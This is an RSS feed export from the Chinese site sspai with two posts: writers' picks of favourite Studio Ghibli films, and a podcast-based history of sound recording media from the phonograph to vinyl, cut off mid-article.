<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:media="http://search.yahoo.com/mrss/">
    <channel>
        <title>少数派 -- 首页</title>
        <link>https://sspai.com</link>
        
        <item>
            <id>https://sspai.com/post/88085</id>
            <title>重回记忆中起风的草原：一人一部最喜欢的吉卜力电影</title>
            <link>https://sspai.com/post/88085</link>
            <guid isPermaLink="false">https://sspai.com/post/88085</guid>
            <pubDate></pubDate>
            <updated>Wed, 17 Apr 2024 09:42:27 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 剧情, 科幻, 冒险, 动画
<br>
<br>
总结: 电影《你想活出怎样的人生》上映，宫崎骏的作品探讨青春、勇气、信赖、魔法、冒险等主题，向世界发出诘问。其中《风之谷》展现了瑰奇壮美的世界和和平主义环保理念，而《魔女宅急便》则讲述了小魔女琪琪在成长过程中的自立故事。 </div>
                        <hr>
                    
                    <p style="margin-left: 0px;">随着电影《你想活出怎样的人生》上映，在惊喜与震撼之余，也有不少人觉得这会是宫崎骏的最后一部作品，回看他所参与创作的 90 余部作品，青春、勇气、信赖、魔法、冒险、战争、人与自然……在治愈观众的同时，也在宏大的主题中向世界发出诘问。本次我们邀请了 6 位作者，来聊聊他们最喜欢的吉卜力电影，影片按照上映时间排序，也欢迎大家在评论区分享对你触动最深的吉卜力作品。</p><p style="margin-left: 0px;">往期推荐可 <a href="https://sspai.com/topic/419" target="_blank">点此</a> 或点击文末 tag <code>#本周看什么</code>；想要查看更多深度影视内容，可以关注衍生栏目「<a href="https://sspai.com/topic/416">看什么 Café</a>」。如有其他建议也欢迎在评论区提出，感谢大家对「看什么」栏目的喜爱和支持。</p><h2>风之谷 (1984)</h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/5d0859cd7572150784fce6c388b2ad55.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：剧情 / 科幻 / 冒险</p><p>片长：117 分钟</p><p>观看渠道：<a href="https://www.netflix.com/title/70019062">Netflix</a>；<a href="https://movie.douban.com/subject/1291585/">豆瓣链接</a></p><blockquote><p>温柔的风啊，继续前进吧。</p></blockquote><p>@SHY：千年前，工业文明达到巅峰，却在被称为「火之七日」的战争中毁于一旦。此后，荒芜的大地被腐海吞噬，人类在瘴气和巨虫的侵袭下苟延残喘。海边小国风之谷的公主娜乌西卡原本过着平静的生活，直到一架载着古代武器「巨神兵」的运输机坠毁于此，被迫卷入由此引发的纷争。</p><p>作为宫崎骏的第一部原创动画长片，1984 年上映的《风之谷》已然奠定了其未来作品的诸多核心要素。发散无边无际的想象，在瑰奇壮美的世界展开令人神往的浪漫冒险，驾着滑翔翼乘风翱翔、勇敢善良的娜乌西卡给我留下了难以磨灭的印象。故事立足于宫老始终强调的和平主义与环保理念，万物有灵，人并非自然的主宰，理应互相理解，探索共生之道。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/75cbdce78295d3bc5784251905c0ff84.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/557de91489fc114dbab01efdd5ca0714.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>不同于宫老的大部分电影，《风之谷》其实是一个「未完结」的故事。影片结尾，千寻与父母回到了原来的世界，苏菲在哈尔的移动城堡过着幸福生活，然而，娜乌西卡的冒险还在继续。本作改编自宫崎骏当时连载的同名漫画，大致涵盖了前两卷内容，电影上映后，漫画仍未停息，逐步揭示宏大的世界观，探讨关乎众生的深邃议题，直到 1994 年才画上句点。</p><p>容量远超电影的《风之谷》漫画，可以说是宫崎骏思想的真正体现，一些在连载中逐步发展的概念，被沿袭至漫画完结后诞生的《幽灵公主》，再度诘问人与自然的关系。围绕腐海及旧文明，娜乌西卡历经战争洗礼与观点碰撞，秉持对一切生命的大爱，主动选择世界的未来，也为蓝衣救世主的古老传说赋予了另一重意义。如果你看完电影仍意犹未尽，不妨去读漫画吧。</p><h2>魔女宅急便 (1989)</h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/7b286f1533e0bdeb45672a1acfcb2da7.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：动画 / 奇幻 / 冒险</p><p>片长：103 分钟 ；<a href="https://movie.douban.com/subject/1307811/">豆瓣链接</a></p><blockquote><p>原来你是来找属于自己的城市的。</p></blockquote><p>@豌豆豆：《魔女宅急便》是宫崎骏导演、编剧和制作的动画电影，影片讲述了小魔女琪琪在陌生的城市中如何面对困难的自立故事，着重刻画了她在成长过程中的经历以及由此带来的心理变化。在《魔女宅急便》诞生之前，宫崎骏一度被认为江郎才尽，这部电影从制作到上映也是一波三折，而海报上的「虽然偶尔很消沉，但我依旧很快乐」也巧妙的和当时老爷子的心境重合了。</p><p>这部影片充满魔幻色彩，又极具现实意义。小魔女琪琪按照魔法界的规则，在年满 13 岁时需要外出修行一年，于是她带着宠物黑猫吉吉来到了克里克镇，并在面包店老板娘索娜的帮助下开始了自己的飞行快递业务。我一直觉得这是老爷子给女孩子们的成人礼，无论是十八岁还是二十八岁再看，都很有收获。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/1e8bd948eb8a38d36de05263f38ed04c.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/259e83712cf3e7cfcbb9efe2bc60a28a.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>琪琪离开家外出修行，对应着我们十八岁初次踏出家门读大学，也可以对应大学毕业迈入职场；莽莽撞撞在大城市展开生活的琪琪就像刚刚到达一个新城市求学或求职的我们，需要熟悉一些规则、学会一些知识，而失去魔法的琪琪也像是遭遇挫折的我们。</p><p>除此之外，同龄人带来的自卑，遭遇危机之后的自我认同的崩塌与重建，琪琪的每一个困境和挫折，我们都能在自己的生活中找到相似的处境。琪琪最终在陌生的城市找到自己的位置和存在的价值，从不被接受到被整个城市认可，也给我们带来融入新世界的勇气。</p><p>相信的心就是你的魔法，这个世界再大，我也一定能找到自己的城市。</p><h2>红猪 <strong>(1992)</strong></h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/975eb9e3e110f0a6b034d610421e6804.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：喜剧 / 动画 / 冒险</p><p>片长：94 分钟；<a href="https://movie.douban.com/subject/1291838/">豆瓣链接</a></p><blockquote><p>飞翔在碧蓝的亚德里亚海上，哪怕化作一头猪，也不失为一种幸福啊。</p></blockquote><p>@知道分子吴先先：马可曾是意大利空军的王牌飞行员，一战后，因不想和墨索里尼政府合作，自我诅咒不再做人，靠着类似赏金猎人的职业谋生。马可是怎样化身为一头猪，最后有没有恢复人形……这些问题《红猪》处理得都很含糊。曾经的战斗英雄，宁可变成猪也不愿成为法西斯的帮凶，既可以理解成奇幻的设定，也可以视为一种语言和身份上的隐喻。</p><p>不过，身为一头猪的设定，丝毫不影响红猪身上的人格魅力。他拥有极佳的飞行和空战技术，如鸟般优雅地驾驶着红色的飞行艇，翱翔在亚德里亚海上空。同时，他还有莫名奇妙的异性魅力，这让不少同行和空贼是又羡又恨：整个亚得里亚海地区飞行员都爱慕的酒馆老板娘吉娜，是红猪的青梅竹马，一直对他抱有好感；天才的飞机设计师，年仅 17 岁的女孩菲奥也深深爱恋着他，在一战后萧条的经济环境下，制造出新的战斗机，帮他完成了和对手的空中对决。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/d44b91099b4591efa60b39275cf06249.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/606cc8c34a6f4895eabed7112978de68.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>《红猪》改编自宫崎骏早年画的一个名叫《飞行艇时代》的短篇，是吉卜力少数几部依据现实的国家、历史背景创作的作品。故事里出现的飞机很多也是历史上真实出现过的机型，不少飞机爱好者做过详细的梳理。</p><p>而这部影片最打动我的，是飞翔在碧海蓝天上，那个灵巧的红色身影本身。漫游在无边无际的天空中，停在宁静的海湾避风港时，仿佛能抛开一切令人不快的现实牵绊，感受到身体和心理的双重自由。而在海岛的一隅，在远方的大陆，还有一份令人憧憬的柔情在守候着自己。这样的人生，对生在乱世的红猪而言，或许就是最理想的吧。</p><h2><strong>千与千寻 (2001)</strong></h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/e193728dc73a3cc6ed411c3f4f1e8584.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：剧情 / 动画 / 奇幻</p><p>片长：125 分钟</p><p>观看渠道：<a href="https://www.netflix.com/sg-zh/title/60023642">Netflix</a>； <a href="https://movie.douban.com/subject/1291561/">豆瓣链接</a></p><blockquote><p>世间有不可思议的事情存在。</p></blockquote><p>@Sholmes：10 岁的少女荻野千寻和她父母正前往新家，不料汽车误入岔路，导致一家人来到一座无人小镇。她想要离开小镇时，却看到刚才正大快朵颐着小镇食物的父母变成了猪。为了救回父母，在少年白龙的帮助下，千寻开始在看起来像是温泉旅馆的「油屋」工作。她发现原来油屋是服侍神明洗澡的地方，还在工作中结识了无脸男和各路人等。后来白龙被钱婆婆打成重伤，为了救他，千寻和刚认识的伙伴们开启了新的冒险之旅。</p><p>虽然是一部奇幻动画片，但片中很多场景都是基于现实而创作的。油屋的外观，参考了爱媛县的道后温泉本馆。神明泡澡的情节，灵感来源是静冈县等地的霜月祭上扮演神祇的人员泡澡的仪式。动画中海原电铁的外观，很像是江户东京建筑园里的都电 7514 型车厢。虚实结合的表现手法，让画面看起来似真似幻。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/d0ca5dce0ec905da91d25af56ecef6b3.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/4a6c646d42d32b414dbdedd98f6f2927.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>初看本片，对搬家的情节感同身受。虽然新家车程不到二十分钟，但对于小孩子来说就如同海的那边一样遥不可及。和小区一墙之隔的公园里没见过的花，学校里不认识的同学，共同构筑起了一个异世界。长大后再看，千寻得到工作机会后第一件事就是被老板改名，新名字突出一个简洁好叫，小千今后要像《年会不能停》里的 Penny 和 Magic 们一样，日复一日的完成那些大大小小的 KPI。</p><p>B 站评论区有人笑谈说，小时候觉得油屋很可怕，里面都是妖魔鬼怪。长大后却觉得油屋很舒服，工作轻松，包吃包住。曾经的异世界变得油腻不堪，不可思议的事情变得稀松平常。多年后，不知还会不会记起自己也曾觉得世间有不可思议的事情存在。</p><h2>哈尔的移动城堡 (2004)</h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/822d421bee03ef380b599ae175259e3d.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：爱情 / 动画 / 奇幻 / 冒险</p><p>片长：119 分钟；<a href="https://movie.douban.com/subject/1308807/">豆瓣链接</a></p><p>观看渠道：<a href="https://www.netflix.com/hk-en/title/70028883">Netflix</a>；4 月 30 日，大陆院线即将重映</p><blockquote><p>苏菲的头发染上了星光的颜色。</p></blockquote><p>@潘誉晗：虽然建议改编《魔法师哈尔与火之恶魔》的是宫崎骏，可其实最初吉卜力选择的导演是细田守（《数码宝贝》）。只是随着项目的推进，他们发现还是不行。因为东映与吉卜力的制作风格存在差异，毕竟只有宫崎骏，才能完美展现出他的风格。于是最后，在厕所的一次简单对谈中，这项重启的项目还是选择了由宫崎骏负责。</p><p>「我拍过很多电影，每次都会讲到异性关系。这次我决定重点刻画这方面的内容，拍一部真正的爱情片。」宫崎骏确实做到了，然后我们有幸地看到了这个动人的爱情故事：交出心脏后无法爱人的哈尔与苏菲有了最为浪漫的初见，空中的那场漫步让人心动至极。被荒野女巫变成老婆婆的苏菲选择离开小镇，无意间来到了哈尔移动的城堡，她壮起胆子走进了这座谁也不敢靠近的地方，也走进了哈尔那颗被封闭的心。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/3664d71902934b140fb8e864887a7035.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/5a3e275f1c73773fed609b8292df1cae.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>虽然每年喊着想在大荧幕上重温这部动画，想听木村拓哉说不漂亮就不行，可其实苏菲才是我在这一场魔法的冒险中，最为欣赏的存在。明明是在少女时候遭受到了无妄之灾，可哪怕是变成了老婆婆，苏菲心里的那份温柔和坚韧，也从未有改变。</p><p>我想也许这就是宫崎骏想在这部动画中表现的主题：爱，可以打败一切，成为一个人勇气的最大来源。就像铃木敏夫说：「在宫先生所有的作品中，《哈尔的移动城堡》大概是最坎坷的一部电影。」可宫崎骏那份哪怕 63 岁，也要和年轻人一决胜负的热爱和坚持，还是让动画在最后诞生出了漂亮的票房，于是铃木再一次深刻认识到了：宫崎骏，果然是「国民导演」。</p><h2>悬崖上的金鱼姬 (2008)</h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/f01c77993ac8d81763afec5010e91139.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：动画 / 奇幻 / 冒险</p><p>片长：101 分钟；<a href="https://movie.douban.com/subject/1959877/">豆瓣链接</a></p><blockquote><p>我们生来就是要化为泡沫的。</p></blockquote><p>@甜约翰：五岁的小男孩宗介与妈妈理莎生活在海边小城的山顶上，一天，宗介在海边玩耍时，遇到了一条被困在玻璃瓶里的金鱼，宗介给它取名为「波妞」并将其带回了家。原来，波妞的爸爸藤本是一名住在海底的魔法师，因厌恶人类的丑陋肮脏而将她变成了一条金鱼，波妞又因为好奇外面的世界而误入玻璃瓶中。没过多久，藤本便强行将波妞带回了海底，为了再次见到宗介，波妞偷走了充满魔力的「生命之水」，以放弃魔法为代价重新变回了人类，再次回到了宗介的身边。</p><p>影片取材于安徒生童话《海的女儿》，101 分钟的时长由超过 17 万张的手稿构成，可爱、清新、想象力十足。本片中，波妞或宗介不再「飞行」，而是将场域搬到了蔚蓝深海，叙事主体关乎成长与选择，更关乎人与人之间最为纯粹的情感，不变的，则是宫崎骏导演作品中一以贯之的奇趣、童真、勇气与爱，对于生态与环保这一母题的全新阐释，以及关于生命的深沉思索。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/93d303965434fc9bcbec20c6f2a1912b.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/3516f694a666f91dbb7c2193bb5f07f8.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>相较于宫崎骏导演的其他作品，《悬崖上的金鱼姬》所描绘的世界观或许不够恢宏浩大，故事情节也没有那么紧张刺激，所谓「意义」更谈不上深沉或深刻，但就是这种删繁就简、返璞归真的清新表达仍能直击人心，简单而纯粹。所以，我们感动于波妞与宗介之间暂且称之为「爱」的微妙情感，清澈又浓烈；感动于波妞乘风破浪再次回到宗介身边的选择，勇敢而坚定；更加感动于宫崎骏导演强大的艺术生命力，以及在电脑技术日新月异的当下，其仍旧坚持手绘的传统，令人敬佩！</p><h2>借东西的小人阿莉埃蒂 (2010)</h2><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/16/3139863a06040f2d646a9838e80c00e3.png?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>关键词：奇幻 / 冒险</p><p>片长：94 分钟； <a href="https://movie.douban.com/subject/4202302/?dt_dapp=1">豆瓣链接</a></p><blockquote><p>阿莉埃蒂，你是我心脏的一部分。</p></blockquote><p>@Voyager_1：《借东西的小人阿莉埃蒂》改编是英国儿童作家玛丽·诺顿的《地板下的小人》（1952 年），由宫崎骏担任编剧，吉卜力工作室出品。故事讲述患有心脏病的男孩儿翔在手术前去姨婆家暂住期间，意外地发现小人阿莉埃蒂和其一家的存在，并企图帮助他们生存地更好，但最终背道而驰的故事。</p><p>在原篇中，作者花了很大的篇幅描述了小人的外貌和生活状态，读者们只有到后半段才能感受到故事的趣味。但在电影里，开头的配乐就相当抓耳，汽车驶入丛林，男孩出进庭院，当阿莉埃蒂在树丛中穿梭，用一片香草遮住自己躲藏人类时，故事就顺其自然地开始了。</p><figure class="ss-imgRows"><img alt="" src="https://cdn.sspai.com/2024/04/16/46bb1494a2757ad27d33b2a6d7778582.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><img alt="" src="https://cdn.sspai.com/2024/04/16/672c9120023352da10476844e332b0e9.jpg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /></figure><p>在吉卜力塑造的微观的世界里，所有的一切不是等比例缩小，而是变成了充满想象力的萌物。钉子做成的云梯、小石头做的移门、小灯泡当手电，大头针当武器，饼干捣碎做面粉等，小人们从大自然和人类的世界里借取必要的物品生活，充实自己的世界，配合着的温馨明媚的画风，所有的一切都令人赏心悦目。</p><p>抱着这是一部平淡简单的作品去看的人，一定会因为这些细节、音乐和作画带来的复合体验获得不错地观感。但影片刻画的人物上，阿莉埃蒂一族并不附属于人类，相反，他们有自尊和追求，不做被自己价值观否定的事情。看起来温柔弱小的翔一方面帮助阿莉埃蒂，内心却脆弱地对自身和小人族群的未来抱有过度悲观的见地。小人虽小，内心却足够丰厚和勇敢，人类虽大，显示出的却并不是伟大和宽宏。那些深层次的思考，吉卜力还是留给了各位。</p><p style="margin-left: 0px;"><strong>🙋：提到「宫崎骏」和「吉卜力」你会想到哪些影视作品？其中对你触动最深的是哪一部？</strong>欢迎在评论区留言分享！</p><p style="margin-left: 0px;">&gt; 小红书 📕 关注 <a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F63f5d65d000000001001d8d4" target="_blank">少数派sspai</a>、<a href="https://sspai.com/link?target=https%3A%2F%2Fwww.xiaohongshu.com%2Fuser%2Fprofile%2F62fb4cf90000000012002431" target="_blank">本周看什么</a>，找到数字时代更好的生活方式 🎊</p><p style="margin-left: 0px;">&gt; <a href="https://sspai.com/topic/416">看什么 Café</a> / <a href="https://sspai.com/topic/419">主题片单</a> 专题页、<a href="https://sspai.com/page/2021/movie">2021 年度回顾</a>，更多影视推荐尽在 <a href="https://sspai.com/tag/%E6%9C%AC%E5%91%A8%E7%9C%8B%E4%BB%80%E4%B9%88">#本周看什么</a> 🎬</p>
                ]]>
            </content:encoded>
        </item>
        
        <item>
            <id>https://sspai.com/post/88090</id>
            <title>这 100 年来，我们如何「听见」声音</title>
            <link>https://sspai.com/post/88090</link>
            <guid isPermaLink="false">https://sspai.com/post/88090</guid>
            <pubDate></pubDate>
            <updated>Wed, 17 Apr 2024 07:00:00 GMT</updated>
                
                
            <content:encoded>
                <![CDATA[
                    
                        <div> 关键词: 现代人, 音乐载体, 留声机, 虫胶唱片
<br>
<br>
总结: 文章介绍了现代人通过流媒体平台随时随地听取各种丰富内容的便利，以及早期人们如何通过留声机和虫胶唱片等音乐载体来欣赏音乐。从留声机的发明到虫胶唱片的广泛生产，展示了音乐载体的变化和影响。 </div>
                        <hr>
                    
                    <h2>写在前面</h2><p>现代人只要愿意，有一部手机和一副耳机，就能随时随地听到各式各样的丰富内容，在流媒体平台上，不管是播客、有声书、新闻还是音乐，都可以找得到，人们的耳朵随时都可以塞得满满的。</p><p>但以前的人呢？在没有流媒体这么方便的时候，他们又是要如何去「听」的呢？</p><p>4 月 20 日，是让所有乐迷和唱片爱好者都很兴奋的一天，因为这天是「国际唱片店日 Record Store Day（RSD）」。借着这个时间节点，歪波音室、少数派，还有专注于自主研发与生产音乐聆听设备的品牌飞傲，联合呈现这期节目。通过这期节目，我们来一起了解音乐载体的变化，从以前的实体音乐例如黑胶、磁带、CD、MD，再到后来的 MP3、串流音乐。这巨大的变化也同样影响了我们所有人，不管是制作音乐，还是听音乐的方式。</p><p>音乐太多，耳朵太少。欢迎收听「Vibration 歪波音室」，我是主播拾壹，下面让我们正式开启今天的音乐之旅。</p><div class="ss-audioSource" id="" src="https://cdn2.wavpub.com/hosting.wavpub.cn/wp-content/uploads/sites/10/2024/04/ssp-V5-final.mp3" title="这 100 年来，我们如何「听见」声音">Audio</div><p>&nbsp;</p><p>可点击上方按钮直接收听，也可点击跳转到 <a href="https://www.xiaoyuzhoufm.com/episode/661e4d5d762b3ec718c59682?s=eyJ1IjoiNWU3YzhhNWFhMmYyZTUwM2NlYzNiNjRiIn0%3D">歪波音室的小宇宙页面</a> 获得更佳聆听体验</p><p>编者注：本文根据播客音频节目改写而成，原内容有着丰富的声音样本，文章因文字形式限制而作出删减，建议读者直接收听节目音频以获得最完整的内容体验，。</p><hr /><h2>最早的载体：看见声音</h2><p>1857 年，一位叫做里昂·斯科特的法国科学家，发明了一种机器叫做「声学振动计」。这台机器就是录音机的鼻祖。我们知道声音是因振动而产生，这台机器通过一层像人的耳鼓膜一样能随声波振动的薄膜，还有一根猪鬃毛，可以把声音振动产生的能量转化成一条条扭曲的细线，刻画在一张烟灰纸上。这是人类第一次把听觉转化成了视觉。不过这台声学振动计，仅仅是在平面上记录了声音的波动而已，它并不能回放。一直到 2008 年，科学家才通过各种神奇的技术手段，成功还原了当时用它记录下的声音，一首古老的法国民谣《致月光》。大家可以在音频里感受一下它听起来什么感觉。</p><p>时间很快来到了 20 年后的 1877 年，那位发明了灯泡和电话的爱迪生，在实验室研究如何改进电话和电报技术的时候，观察到当声音通过电话话筒时，振动膜片会使针尖在柔软的表面上留下痕迹。然后他就想，如果能够找到一种方法来记录这些痕迹，并使它们能够被重放，那么就有可能发明一种声音录制和重放的机器。随后他便和助手们开始了一系列的实验，终于发明了人类真正意义上的第一台录音机——留声机。</p><figure class="image ss-img-wrapper"><img alt="爱迪生的留声机发明_手机搜狐网" src="https://cdn.sspai.com/2024/04/15/article/a4b9aaf3b5fc48984a1bd6456b5a75c5.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>爱迪生与留声机</figcaption></figure><p>这个设备的中心是一个旋转的圆柱体，上面覆盖着一层薄薄的金属箔。一个尖锐的钢针固定在一个振动膜片上，当声音通过时，针会在金属箔上划出一系列的波形沟槽。为了重放录制的声音，爱迪生也设计了一个类似的系统，将针放在之前划过的痕迹上，当圆柱体旋转时，针会沿着这个痕迹移动，从而振动膜片和喇叭重现声音。爱迪生为了测试这台机器，朗读了一首起源于 1830 年的英语儿歌《玛丽有只小绵羊》里面的几句歌词，用留声机录了下来。这几句幼稚的歌词，成为了人类成功捕捉和储存声音的开端。而留声机的发明，也标志着人类第一次能够录制和重放声音，为后来的音乐产业和有声电影的发展奠定了基础。</p><h2>虫胶 Shellac Discs</h2><p>留声机的时代，各种录音和音乐都是储存在一个个表面是锡箔纸或者蜡纸的小圆桶上。但因为材质的关系，这些录音不仅录的质量很差，还不太耐用，能播放的次数不多。对于录制过程的要求也很高，因为它不能复制，据说当时如果有人订购 100 张唱片，那么唱片公司就得让歌手去录音 100 次甚至更多。于是，为了提升留声机的可用性和稳定性，一众发明家、科学家开始了对留声机和存储介质的改良。</p><p>这一转眼又是 11 年过去了。1888 年，留美的德国工程师埃米尔·伯林纳，改良了爱迪生的滚筒式留声机，推出了世界上第一个盘型留声机，在美国费城展出。这款新的留声机，采用的是一片涂上了蜡的圆形金属锌板，来作为播放和录音的中介媒体，而且可以制作成固定的模板，来进行唱片的复制，解决了卖 100 张唱片歌手要录 100 次的大难题，你可以把它看做是我们现在熟知的黑胶唱片的鼻祖。很快，埃米尔·伯林纳又使用了硫化橡胶代替涂蜡锌板，并且在 1890 年初成功量产了 5 英寸大小的硫化橡胶唱片在欧洲市场出售。这批唱片在德国发行，共 25000 张，现在留存非常稀有。据说，世界上最古老的商业唱片就是来自这一批，所以也可以说伯林纳就是商业唱片之父。</p><figure class="image ss-img-wrapper"><img alt="深圳市梵尼诗留声机有限公司" src="https://cdn.sspai.com/2024/04/15/article/6822f40933371df681dd2cf44db54552.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>埃米尔·伯林纳的盘型留声机</figcaption></figure><p>5 年后的 1895 年，还是 埃米尔·伯林纳，他又盯上了一种新的材料，叫做「虫胶」。虫胶是从一种叫做介壳虫的害虫身上分泌的粘稠物质而来，干了以后会硬化。当时通常会在被感染的树木上采集虫胶，然后加上粘土、棉纤维等其他的材料混合，用炭黑来着色，从而制成扁扁的圆形唱片，就叫做「虫胶唱片 Shellac Disc」。1897 年以后，虫胶唱片被广泛批量生产，因为它上面的纹路较粗，且转速为每分钟 78 转，所以也被广泛称为「78 转唱片」或「78 转粗纹唱片」，单面能录制 3～4 分钟的声音。埃米尔·伯林纳对唱片制作工艺的改良，让录音变得更容易复制和保存，成为了业界标准。在经过不断改善虫胶唱片的质量之后，现代的唱片工业也由此奠定了基础。</p><p>从最早的烟灰纸，再到圆筒形唱片，再到虫胶唱片，前后大约花了 35 年，唱片终于找到了一个长久的、可以发展的材料。这其中有着两张非常有意义的虫胶唱片。1902 年 4 月，男高音歌唱家卡鲁索，录制了他的作品并发行了虫胶唱片，成为了第一个靠录音唱片而著名的歌手，并且后来越来越多的歌手加入，这些音乐家们，打开了唱片市场的需求。1913 年，世界上第一张完整的管弦乐唱片也出现了，这是由胜利留声机公司录制的，由尼基什指挥柏林爱乐乐团演奏的《贝多芬第五交响曲》。</p><p>很有趣的是，虫胶唱片的出现也对音乐创作产生了很大的影响——单面只能录几分钟的限制决定了未来流行歌曲的时长。当时世界上几乎所有民族的传统音乐都没有这么短的，无法完整录进这个唱片里面。所以当时的音乐家、音乐人，就开始根据这个时间特点来创作流行歌曲。随着「78 转唱片」的影响力在民间的扩大，人们听音乐的习惯也标准化了。甚至一直到今天，我们听的歌曲大多数还是 3～4 分钟这个时间左右。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/be47d885c857fc1ae7c6c2699a899786.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>《四五花洞》唱片（图源：<a href="https://m.thepaper.cn/newsDetail_forward_23469194">澎湃新闻</a>）</figcaption></figure><p>1897 年，上海南京路上的英国商贩「谋得利洋行」把留声机引进了上海，打开了中国的唱片市场。到了 1920 年代，上海的经济得到很大的发展，唱片销量也进入了黄金时期，形形色色国内国外的唱片制作公司与唱片行在市场上争奇斗艳，造就了很多的明星和经典的音乐作品。例如 1927 年的《毛毛雨》，由中文流行音乐之父黎锦晖创作，其女儿黎明晖演唱，把民间小调与西方现代爵士乐相结合，被视为是最早的中文流行歌曲；还有 1932 年由梅兰芳、尚小云、程砚秋、荀慧生共同录制的《四五花洞》唱片，就是四大名旦唯一合作的唱片作品。虫胶唱片在当时的中国音乐文化中扮演了重要角色，不仅记录了戏曲和流行音乐的发展，也反映了社会风貌和艺术生活。</p><h2>黑胶 Vinyl</h2><p>1939 年，第二次世界大战爆发。</p><p>因为其中一种主要成分「罂子桐酸」是制造防弹玻璃和防紫外线、防辐射等军用器材的原料之一，战争年代的虫胶成了关键的军事物资而受到了政府管制。这就让唱片的发展陷入了停滞。当时很多虫胶唱片也被政府收走，存起来给军方使用。唱片公司因为缺材料没办法生产新唱片，只能要求来买唱片的人，要用一定数量的旧唱片来换新的唱片，好让他们回收材料再继续制造新唱片。因此很多音乐作品就这样丢失了。</p><figure class="image ss-img-wrapper"><img src="https://cdn.sspai.com/2024/04/15/article/57df607c1773a564f06464afd19eeb85.jpeg?imageView2/2/w/1120/q/90/interlace/1/ignore-error/1" /><figcaption>图为 1942 年为征集物资而举办的一场舞会，入场券是五张虫胶（图源 <a href="https://newsinteractive.post-gazette.com/thedigs/2013/11/18/breaking-records-for-the-war-effort/" target="_blank">The Pittsburgh Post-Gazette</a>）</figcaption></figure><p>1945 年二战结束，百废待兴，唱片行业也没有闲着。1948 年，哥伦比亚唱片旗下 CBS 实验室有一个热爱听古典音乐的家伙，叫做 Peter Goldmark。他当时对用 78 转的虫胶唱片播放古典乐时必须不断换唱片这一点感到十分不满，于是就发誓要改造唱片。当时有两个已知的办法可以增加录制时长——减慢唱片的转速，并增加唱片的沟纹数。但这样做的话，唱片的音质就会受到影响，比如增加失真度，扩大噪音，甚至缩小频率响应范围。而他的方案是用钻石做唱针，用乙烯基树脂（Vinylite）也就是 PVC 为唱片材料，把唱片转速降到每分钟 33.3 转并增加沟纹密度，使得一张12英寸（约30厘米）唱片每面可放 20～30 分钟左右的音乐。</p><p>1948 年 6 月 21 日，在纽约的 Waldorf Astoria 酒店，哥伦比亚唱片公司举办了一场发布会，正式发布了他们研发的这种唱片。在发布会的现场，他们将大量的虫胶唱片堆叠在地上，高度将近 2、3 米。接着当时哥伦比亚唱片的主席 Wallerstein 拿着一摞加起来不过 50cm 不到的新式唱片走上讲台，对着记者们说：「看到了吗，朋友们？仅仅是我手里的这些新式唱片，就容纳了旁边这堆 78 转唱片的所有内容！这就是我们的 Long Playing Record。」这种唱片就是我们现在经常谈论的黑胶唱片了，也被称作为 LP 